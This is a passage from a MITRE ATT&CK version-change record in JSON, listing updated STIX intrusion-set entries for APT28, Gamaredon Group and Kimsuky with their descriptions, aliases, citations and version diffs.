class=\"diff_add\">argets.(Citation:&nbsp;Lab52&nbsp;WIRTE&nbsp;Apr&nbsp;2019)(Citation:&nbsp;Kaspersky&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">WIRTE&nbsp;November&nbsp;2021)(Citation:&nbsp;Check&nbsp;Point&nbsp;Wirte&nbsp;NOV&nbsp;2024)(C</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">itation:&nbsp;Palo&nbsp;Alto&nbsp;Ashen&nbsp;Lepus&nbsp;DEC&nbsp;2025)</span></td></tr>\n        </tbody>\n    </table>"
                }
            ],
            "minor_version_changes": [
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:31:48.664000+00:00",
                    "modified": "2026-04-21 13:20:49.866000+00:00",
                    "name": "APT28",
                    "description": "[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018)(Citation: ESET Zebrocy May 2019)\n\n[APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election.(Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034). ",
                    "aliases": [
                        "APT28",
                        "IRON TWILIGHT",
                        "SNAKEMACKEREL",
                        "Swallowtail",
                        "Group 74",
                        "Sednit",
                        "Sofacy",
                        "Pawn Storm",
                        "Fancy Bear",
                        "STRONTIUM",
                        "Tsar Team",
                        "Threat Group-4127",
                        "TG-4127",
                        "Forest Blizzard",
                        "FROZENLAKE",
                        "GruesomeLarch"
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G0007",
                            "external_id": "G0007"
                        },
                        {
                            "source_name": "SNAKEMACKEREL",
                            "description": "(Citation: Accenture SNAKEMACKEREL Nov 2018)"
                        },
                        {
                            "source_name": "Fancy Bear",
                            "description": "(Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)"
                        },
                        {
                            "source_name": "Tsar Team",
                            "description": "(Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)"
                        },
                        {
                            "source_name": "APT28",
                            "description": "(Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)"
                        },
                        {
                            "source_name": "STRONTIUM",
                            "description": "(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)"
                        },
                        {
                            "source_name": "FROZENLAKE",
                            "description": "(Citation: Leonard TAG 2023)"
                        },
                        {
                            "source_name": "Forest Blizzard",
                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
                        },
                        {
                            "source_name": "GruesomeLarch",
                            "description": "(Citation: Nearest Neighbor Volexity)"
                        },
                        {
                            "source_name": "IRON TWILIGHT",
                            "description": "(Citation: Secureworks IRON TWILIGHT Profile)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)"
                        },
                        {
                            "source_name": "Threat Group-4127",
                            "description": "(Citation: SecureWorks TG-4127)"
                        },
                        {
                            "source_name": "TG-4127",
                            "description": "(Citation: SecureWorks TG-4127)"
                        },
                        {
                            "source_name": "Pawn Storm",
                            "description": "(Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020) "
                        },
                        {
                            "source_name": "Swallowtail",
                            "description": "(Citation: Symantec APT28 Oct 2018)"
                        },
                        {
                            "source_name": "Group 74",
                            "description": "(Citation: Talos Seduploader Oct 2017)"
                        },
                        {
                            "source_name": "Accenture SNAKEMACKEREL Nov 2018",
                            "description": "Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.",
                            "url": "https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50"
                        },
                        {
                            "source_name": "Crowdstrike DNC June 2016",
                            "description": "Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.",
                            "url": "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
                        },
                        {
                            "source_name": "Leonard TAG 2023",
                            "description": "Billy Leonard. (2023, April 19). Ukraine remains Russia\u2019s biggest cyber focus in 2023. Retrieved March 1, 2024.",
                            "url": "https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/"
                        },
                        {
                            "source_name": "US District Court Indictment GRU Oct 2018",
                            "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.",
                            "url": "https://www.justice.gov/opa/page/file/1098481/download"
                        },
                        {
                            "source_name": "GRIZZLY STEPPE JAR",
                            "description": "Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE \u2013 Russian Malicious Cyber Activity. Retrieved January 11, 2017.",
                            "url": "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf"
                        },
                        {
                            "source_name": "ESET Zebrocy May 2019",
                            "description": "ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.",
                            "url": "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/"
                        },
                        {
                            "source_name": "ESET Sednit Part 3",
                            "description": "ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.",
                            "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf"
                        },
                        {
                            "source_name": "Sofacy DealersChoice",
                            "description": "Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.",
                            "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/"
                        },
                        {
                            "source_name": "FireEye APT28 January 2017",
                            "description": "FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved November 17, 2024.",
                            "url": "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf"
                        },
                        {
                            "source_name": "FireEye APT28",
                            "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.",
                            "url": "https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf"
                        },
                        {
                            "source_name": "Ars Technica GRU indictment Jul 2018",
                            "description": "Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.",
                            "url": "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/"
                        },
                        {
                            "source_name": "TrendMicro Pawn Storm Dec 2020",
                            "description": "Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm\u2019s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.",
                            "url": "https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html"
                        },
                        {
                            "source_name": "Securelist Sofacy Feb 2018",
                            "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.",
                            "url": "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/"
                        },
                        {
                            "source_name": "Kaspersky Sofacy",
                            "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.",
                            "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/"
                        },
                        {
                            "source_name": "Nearest Neighbor Volexity",
                            "description": "Koessel, Sean. Adair, Steven. Lancaster, Tom. (2024, November 22). The Nearest Neighbor Attack: How A Russian APT Weaponized Nearby Wi-Fi Networks for Covert Access. Retrieved February 25, 2025.",
                            "url": "https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/"
                        },
                        {
                            "source_name": "Palo Alto Sofacy 06-2018",
                            "description": "Lee, B., Falcone, R. (2018, June 06). Sofacy Group\u2019s Parallel Attacks. Retrieved June 18, 2018.",
                            "url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/"
                        },
                        {
                            "source_name": "Talos Seduploader Oct 2017",
                            "description": "Mercer, W., et al. (2017, October 22). \"Cyber Conflict\" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.",
                            "url": "https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html"
                        },
                        {
                            "source_name": "Microsoft Threat Actor Naming July 2023",
                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
                        },
                        {
                            "source_name": "Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020",
                            "description": "Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.",
                            "url": "https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/"
                        },
                        {
                            "source_name": "Microsoft STRONTIUM Aug 2019",
                            "description": "MSRC Team. (2019, August 5). Corporate IoT \u2013 a path to intrusion. Retrieved August 16, 2019.",
                            "url": "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/"
                        },
                        {
                            "source_name": "DOJ GRU Indictment Jul 2018",
                            "description": "Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved November 17, 2024.",
                            "url": "https://cdn.cnn.com/cnn/2018/images/07/13/gru.indictment.pdf"
                        },
                        {
                            "source_name": "Cybersecurity Advisory GRU Brute Force Campaign July 2021",
                            "description": "NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.",
                            "url": "https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF"
                        },
                        {
                            "source_name": "NSA/FBI Drovorub August 2020",
                            "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.",
                            "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF"
                        },
                        {
                            "source_name": "SecureWorks TG-4127",
                            "description": "SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.",
                            "url": "https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign"
                        },
                        {
                            "source_name": "Secureworks IRON TWILIGHT Active Measures March 2017",
                            "description": "Secureworks CTU. (2017, March 30). IRON TWILIGHT Supports Active Measures. Retrieved February 28, 2022.",
                            "url": "https://www.secureworks.com/research/iron-twilight-supports-active-measures"
                        },
                        {
                            "source_name": "Secureworks IRON TWILIGHT Profile",
                            "description": "Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022.",
                            "url": "https://www.secureworks.com/research/threat-profiles/iron-twilight"
                        },
                        {
                            "source_name": "Symantec APT28 Oct 2018",
                            "description": "Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.",
                            "url": "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government"
                        },
                        {
                            "source_name": "Sednit",
                            "description": "This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://attack.mitre.org/software/S0044).(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018)"
                        },
                        {
                            "source_name": "Sofacy",
                            "description": "This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Drew Church, Splunk",
                        "Emily Ratliff, IBM",
                        "Richard Gold, Digital Shadows",
                        "S\u00e9bastien Ruel, CGI"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "5.3",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-21 13:20:49.866000+00:00\", \"old_value\": \"2025-03-10 20:15:06.958000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"5.3\", \"old_value\": \"5.2\"}}}",
                    "previous_version": "5.2",
                    "version_change": "5.2 \u2192 5.3"
                },
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:32:09.849000+00:00",
                    "modified": "2026-04-19 00:11:03.898000+00:00",
                    "name": "Gamaredon Group",
                    "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) is a suspected Russian cyber espionage group that has targeted military, law enforcement, judiciary, non-profit, and non-governmental organizations in Ukraine since at least 2013. The name [Gamaredon Group](https://attack.mitre.org/groups/G0047) derives from a misspelling of the word \"Armageddon,\" found in early campaigns.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: Symantec Shuckworm January 2022)(Citation: Microsoft Actinium February 2022)\n\nIn November 2021, the Ukrainian government publicly attributed [Gamaredon Group](https://attack.mitre.org/groups/G0047) to Russia\u2019s Federal Security Service (FSB) Center 18, an assessment later supported by multiple independent cybersecurity researchers. (Citation: Bleepingcomputer Gamardeon FSB November 2021)(Citation: Microsoft Actinium February 2022)",
                    "aliases": [
                        "Gamaredon Group",
                        "IRON TILDEN",
                        "Primitive Bear",
                        "ACTINIUM",
                        "Armageddon",
                        "Shuckworm",
                        "DEV-0157",
                        "Aqua Blizzard",
                        "NastyShrew"
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G0047",
                            "external_id": "G0047"
                        },
                        {
                            "source_name": "Cloudflare 2026 Threat Report New Threat Actors March 2026",
                            "description": " Cloudflare. (2026, March 3). Introducing the 2026 Cloudflare Threat Report. Retrieved April 18, 2026.",
                            "url": "https://blog.cloudflare.com/2026-threat-report/"
                        },
                        {
                            "source_name": "NastyShrew",
                            "description": "(Citation: Cloudflare 2026 Threat Report New Threat Actors March 2026)"
                        },
                        {
                            "source_name": "ACTINIUM",
                            "description": "(Citation: Microsoft Actinium February 2022)"
                        },
                        {
                            "source_name": "DEV-0157",
                            "description": "(Citation: Microsoft Actinium February 2022)"
                        },
                        {
                            "source_name": "Aqua Blizzard",
                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
                        },
                        {
                            "source_name": "Gamaredon Group",
                            "description": "(Citation: Palo Alto Gamaredon Feb 2017)"
                        },
                        {
                            "source_name": "IRON TILDEN",
                            "description": "(Citation: Secureworks IRON TILDEN Profile)"
                        },
                        {
                            "source_name": "Armageddon",
                            "description": "(Citation: Symantec Shuckworm January 2022)"
                        },
                        {
                            "source_name": "Shuckworm",
                            "description": "(Citation: Symantec Shuckworm January 2022)"
                        },
                        {
                            "source_name": "Primitive Bear",
                            "description": "(Citation: Unit 42 Gamaredon February 2022)"
                        },
                        {
                            "source_name": "ESET Gamaredon June 2020",
                            "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.",
                            "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"
                        },
                        {
                            "source_name": "TrendMicro Gamaredon April 2020",
                            "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020.",
                            "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/"
                        },
                        {
                            "source_name": "Palo Alto Gamaredon Feb 2017",
                            "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
                            "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
                        },
                        {
                            "source_name": "Microsoft Threat Actor Naming July 2023",
                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
                        },
                        {
                            "source_name": "Microsoft Actinium February 2022",
                            "description": "Microsoft Threat Intelligence Center. (2022, February 4). ACTINIUM targets Ukrainian organizations. Retrieved February 18, 2022.",
                            "url": "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"
                        },
                        {
                            "source_name": "Secureworks IRON TILDEN Profile",
                            "description": "Secureworks CTU. (n.d.). IRON TILDEN. Retrieved February 24, 2022.",
                            "url": "https://www.secureworks.com/research/threat-profiles/iron-tilden"
                        },
                        {
                            "source_name": "Symantec Shuckworm January 2022",
                            "description": "Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022.",
                            "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine"
                        },
                        {
                            "source_name": "Bleepingcomputer Gamardeon FSB November 2021",
                            "description": "Toulas, B. (2018, November 4). Ukraine links members of Gamaredon hacker group to Russian FSB. Retrieved April 15, 2022.",
                            "url": "https://www.bleepingcomputer.com/news/security/ukraine-links-members-of-gamaredon-hacker-group-to-russian-fsb/"
                        },
                        {
                            "source_name": "Unit 42 Gamaredon February 2022",
                            "description": "Unit 42. (2022, February 3). Russia\u2019s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine. Retrieved February 21, 2022.",
                            "url": "https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "ESET",
                        "Trend Micro Incorporated",
                        "Yoshihiro Kori, NEC Corporation",
                        "Manikantan Srinivasan, NEC Corporation India",
                        "Pooja Natarajan, NEC Corporation India"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.3",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-19 00:11:03.898000+00:00\", \"old_value\": \"2025-10-24 01:05:47.958000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.3\", \"old_value\": \"3.2\"}}, \"iterable_item_added\": {\"root['aliases'][8]\": \"NastyShrew\", \"root['external_references'][1]\": {\"source_name\": \"Cloudflare 2026 Threat Report New Threat Actors March 2026\", \"description\": \" Cloudflare. (2026, March 3). Introducing the 2026 Cloudflare Threat Report. Retrieved April 18, 2026.\", \"url\": \"https://blog.cloudflare.com/2026-threat-report/\"}, \"root['external_references'][2]\": {\"source_name\": \"NastyShrew\", \"description\": \"(Citation: Cloudflare 2026 Threat Report New Threat Actors March 2026)\"}}}",
                    "previous_version": "3.2",
                    "version_change": "3.2 \u2192 3.3"
                },
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--0ec2f388-bf0f-4b5c-97b1-fc736d26c25f",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-08-26 15:03:02.577000+00:00",
                    "modified": "2026-04-23 18:46:50.938000+00:00",
                    "name": "Kimsuky",
                    "description": "[Kimsuky](https://attack.mitre.org/groups/G0094) is a Democratic People's Republic of Korea (DPRK)-based cyber espionage group that has been active since at least 2012. The group initially targeted South Korean government agencies, think tanks, and subject-matter experts in various fields. Its operations expanded to include the United Nations and organizations in the government, education, business services, and manufacturing sectors across the United States, Japan, Russia, and Europe. [Kimsuky](https://attack.mitre.org/groups/G0094) has focused collection on foreign policy and national security issues tied to the Korean Peninsula, nuclear policy, and sanctions. [Kimsuky](https://attack.mitre.org/groups/G0094) operations have overlapped with those of other North Korean state-sponsored cyber espionage actors as a result of ad hoc collaborations or other limited resource sharing.(Citation: EST Kimsuky April 2019)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: CISA AA20-301A Kimsuky)(Citation: Mandiant APT43 March 2024)(Citation: Proofpoint TA427 April 2024) \n\n[Kimsuky](https://attack.mitre.org/groups/G0094) was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).(Citation: Netscout Stolen Pencil Dec 2018)(Citation: EST Kimsuky SmokeScreen April 2019)(Citation: AhnLab Kimsuky Kabar Cobra Feb 2019) In 2023, [Kimsuky](https://attack.mitre.org/groups/G0094) was observed using commercial large language models (LLMs) to assist with vulnerability research, scripting, social engineering and reconnaissance.(Citation: MSFT-AI)\n\nDPRK threat actor cluster boundaries overlap in open source reporting, with some security researchers consolidating all attributed North Korean state-sponsored cyber activity under [Lazarus Group](https://attack.mitre.org/groups/G0032), rather than tracking operationally distinct subgroups.",
                    "aliases": [
                        "Kimsuky",
                        "Black Banshee",
                        "Velvet Chollima",
                        "Emerald Sleet",
                        "THALLIUM",
                        "APT43",
                        "TA427",
                        "Springtail",
                        "Earth Kumiho",
                        "PatheticSlug"
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G0094",
                            "external_id": "G0094"
                        },
                        {
                            "source_name": "Cloudflare 2026 Threat Report New Threat Actors March 2026",
                            "description": " Cloudflare. (2026, March 3). Introducing the 2026 Cloudflare Threat Report. Retrieved April 18, 2026.",
                            "url": "https://blog.cloudflare.com/2026-threat-report/"
                        },
                        {
                            "source_name": "PatheticSlug",
                            "description": "(Citation: Cloudflare 2026 Threat Report New Threat Actors March 2026)"
                        },
                        {
                            "source_name": "Black Banshee",
                            "description": "(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)"
                        },
                        {
                            "source_name": "THALLIUM",
                            "description": "(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: Mandiant APT43 March 2024)(Citation: Proofpoint TA427 April 2024)"
                        },
                        {
                            "source_name": "APT43",
                            "description": "(Citation: Mandiant APT43 March 2024)(Citation: Proofpoint TA427 April 2024)"
                        },
                        {
                            "source_name": "Emerald Sleet",
                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)(Citation: Proofpoint TA427 April 2024)"
                        },
                        {
                            "source_name": "TA427",
                            "description": "(Citation: Proofpoint TA427 April 2024)"
                        },
                        {
                            "source_name": "Earth Kumiho",
                            "description": "(Citation: Rapid7 Threat Landscape Actors March 2026)"
                        },
                        {
                            "source_name": "Kimsuky",
                            "description": "(Citation: Securelist Kimsuky Sept 2013)(Citation: Malwarebytes Kimsuky June 2021)"
                        },
                        {
                            "source_name": "Springtail",
                            "description": "(Citation: Symantec Troll Stealer 2024)"
                        },
                        {
                            "source_name": "Velvet Chollima",
                            "description": "(Citation: Zdnet Kimsuky Dec 2018)(Citation: ThreatConnect Kimsuky September 2020)(Citation: Malwarebytes Kimsuky June 2021)"
                        },
                        {
                            "source_name": "AhnLab Kimsuky Kabar Cobra Feb 2019",
                            "description": "AhnLab. (2019, February 28). Operation Kabar Cobra - Tenacious cyber-espionage campaign by Kimsuky Group. Retrieved September 29, 2021.",
                            "url": "https://global.ahnlab.com/global/upload/download/techreport/%5BAnalysis_Report%5DOperation%20Kabar%20Cobra.pdf"
                        },
                        {
                            "source_name": "EST Kimsuky April 2019",
                            "description": "Alyac. (2019, April 3). Kimsuky Organization Steals Operation Stealth Power. Retrieved August 13, 2019.",
                            "url": "https://blog.alyac.co.kr/2234"
                        },
                        {
                            "source_name": "Netscout Stolen Pencil Dec 2018",
                            "description": "ASERT team. (2018, December 5). STOLEN PENCIL Campaign Targets Academia. Retrieved February 5, 2019.",
                            "url": "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/"
                        },
                        {
                            "source_name": "Zdnet Kimsuky Dec 2018",
                            "description": "Cimpanu, C.. (2018, December 5). Cyber-espionage group uses Chrome extension to infect victims. Retrieved August 26, 2019.",
                            "url": "https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/"
                        },
                        {
                            "source_name": "CISA AA20-301A Kimsuky",
                            "description": "CISA, FBI, CNMF. (2020, October 27). https://us-cert.cisa.gov/ncas/alerts/aa20-301a. Retrieved November 4, 2020.",
                            "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-301a"
                        },
                        {
                            "source_name": "Cybereason Kimsuky November 2020",
                            "description": "Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020.",
                            "url": "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite"
                        },
                        {
                            "source_name": "EST Kimsuky SmokeScreen April 2019",
                            "description": "ESTSecurity. (2019, April 17). Analysis of the APT Campaign \u2018Smoke Screen\u2019 targeting to Korea and US  \ucd9c\ucc98: https://blog.alyac.co.kr/2243 [\uc774\uc2a4\ud2b8\uc2dc\ud050\ub9ac\ud2f0 \uc54c\uc57d \ube14\ub85c\uadf8]. Retrieved September 29, 2021.",
                            "url": "https://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdf"
                        },
                        {
                            "source_name": "Malwarebytes Kimsuky June 2021",
                            "description": "Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021.",
                            "url": "https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/"
                        },
                        {
                            "source_name": "Proofpoint TA427 April 2024",
